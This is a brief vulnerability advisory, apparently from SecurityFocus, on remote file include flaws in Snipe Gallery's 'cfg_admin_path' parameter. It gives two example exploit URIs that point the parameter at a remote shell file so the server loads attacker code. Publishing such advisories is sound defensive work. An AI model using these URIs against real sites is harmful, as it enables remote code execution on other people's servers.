Snipe Gallery 'cfg_admin_path' Parameter Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/gallery.php?cfg_admin_path=[shell.txt ]
http://www.example.com/image.php?cfg_admin_path=[shell.txt ]


 

Privacy Statement
Copyright 2010, SecurityFocus